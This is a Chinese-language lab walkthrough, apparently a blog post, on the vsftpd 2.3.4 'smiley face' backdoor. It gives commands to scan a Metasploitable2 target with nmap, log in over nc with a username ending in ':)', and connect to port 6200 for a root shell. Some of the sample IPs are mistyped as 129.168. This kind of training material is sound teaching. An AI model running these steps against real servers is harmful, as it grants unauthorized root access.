笑脸漏洞vsftpd-2.3.4
一、介绍vsftpd存在一个后门漏洞,虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。二、准备1.kali主机2.靶机Metasploitable2-Linux如未安装好以上虚拟机,可参考以下链接Kali Linux 安装
目录
一、介绍
vsftpd存在一个后门漏洞,虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。
vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。
二、准备
1.kali主机
2.靶机Metasploitable2-Linux
如未安装好以上虚拟机,可参考以下链接
Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程
Download Metasploitable from SourceForge.net
三、检测笑脸漏洞
由于一些厂商经常会对自己的软件打补丁,因此同一软件有的版本存在漏洞,有的版本不存在漏洞。我们即使发现了目标系统中安装了vsftpd-2.3.4,也不能完全确定它就存在笑脸漏洞。
1.运行kali主机和靶机
2 .配置环境
首先打开kali主机选项卡设置
确保kali主机为“NAT模式”
靶机设置同上
当两个虚拟机都为“NAT模式”时,才能保证它们是在同一局域网下 。
3.查看本机IP地址
注:以下IP地址均为样例
打开kali主机终端,执行命令ifconfig
4.扫描靶机服务版本号
执行命令nmap 192.168.xxx.0/24
下拉查看到vsftpd-2.3.4服务版本号,在靶机IP地址192.168.xxx.129的21端口上。
5.笑脸登录
执行命令nc 129.168.xxx.129并进行笑脸登录(用户名以“:)”结尾),密码任意
之后打开一个新的终端,原来的终端不要关闭
在新终端上执行命令nmap -p 6200 129.168.xxx.129
查看靶机的6200端口是否开放
我们发现靶机6200端口以开放,说明该vsftpd-2.3.4服务版本号存在笑脸漏洞。
四、连接6200端口
如果在你使用命令nmap -p 6200 129.168.xxx.129查看6200端口是否开发后,你的笑脸登录被弹出了,需要重新进行笑脸登录
保持该终端打开,在新终端窗口执行命令nc 129.168.xxx.129 6200连接靶机的6200端口。
此时已经可以输入命令控制靶机了。例如输入命令whoami可查看我方身份。
返回root字符串,说明我方在以root权限连接该靶机。
更多推荐
所有评论(0)